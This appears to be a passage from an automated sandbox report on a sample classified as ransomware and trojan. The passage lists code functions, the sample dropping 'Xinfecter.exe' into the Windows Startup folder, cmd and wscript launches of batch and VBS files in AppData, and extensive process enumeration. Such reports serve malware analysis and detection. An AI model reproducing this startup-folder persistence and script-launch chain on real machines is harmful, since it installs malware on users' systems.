      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005A533042_2_005A5330
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005E540042_2_005E5400
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005BF57042_2_005BF570
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0060D55742_2_0060D557
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0062F5F042_2_0062F5F0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_006535A342_2_006535A3
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005E163042_2_005E1630
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_006537D242_2_006537D2
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0061386042_2_00613860
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0066987942_2_00669879
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0064B81742_2_0064B817
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0061990842_2_00619908
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0060D99042_2_0060D990
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005ABA6042_2_005ABA60
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00633AE542_2_00633AE5
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B5AC042_2_005B5AC0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005BDAF042_2_005BDAF0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B9ABA42_2_005B9ABA
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005ADAB042_2_005ADAB0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00661B7142_2_00661B71
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B1B7F42_2_005B1B7F
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00613C7042_2_00613C70
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00659CD042_2_00659CD0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00605C8442_2_00605C84
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00605EA842_2_00605EA8
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005E3E8042_2_005E3E80
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00607FA042_2_00607FA0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: String function: 009E80D0 appears 45 times
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: String function: 00A41B70 appears 70 times
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: String function: 009E9B40 appears 64 times
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: String function: 00A415B1 appears 82 times
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: String function: 009EB8D0 appears 48 times
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: String function: 009E1BD0 appears 68 times
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: String function: 00A40C3C appears 58 times
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: String function: 00A4157D appears 186 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 0063157D appears 164 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 005D1BD0 appears 68 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 005D9B40 appears 64 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 005D80D0 appears 34 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 00631B70 appears 60 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 005DB8D0 appears 48 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: String function: 006315B1 appears 63 times
      Source: xKvkNk9SXR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.rans.troj.adwa.evad.winEXE@116/22@1/2
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C5920 PathIsNetworkPathA,__alloca_probe_16,MultiByteToWideChar,GetDiskFreeSpaceExW,0_2_009C5920
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3292:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:616:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:736:120:WilError_03
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: xKvkNk9SXR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="332"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="420"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="496"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="504"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="564"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="632"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="640"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="780"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="788"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="872"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="924"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="992"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="444"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="732"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="280"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1032"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1056"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1068"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1148"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1188"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1232"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1324"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1384"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1416"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1424"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1460"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1584"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1612"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1660"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1688"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1700"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1820"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1836"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1936"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1944"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1952"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2024"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2096"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2152"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2188"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2204"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2240"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2392"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2400"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2440"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2484"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2492"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2528"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2588"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2596"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2628"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2768"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2868"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2932"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3260"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3512"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3696"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3756"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3984"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2456"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4132"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4800"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4572"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5152"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5932"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6708"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6792"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6836"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6960"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3584"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5500"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5280"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4296"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4820"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5840"::GetOwner
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1440"::GetOwner
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1440"::GetOwner
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="332"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="420"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="496"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="504"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="564"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="632"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="640"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="780"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="788"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="872"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="924"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="992"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="444"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="732"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="280"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1032"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1056"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1068"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1148"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1188"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1232"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1324"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1384"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1416"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1424"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1460"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1584"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1612"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1660"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1688"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1700"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1820"::GetOwner
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1836"::GetOwner
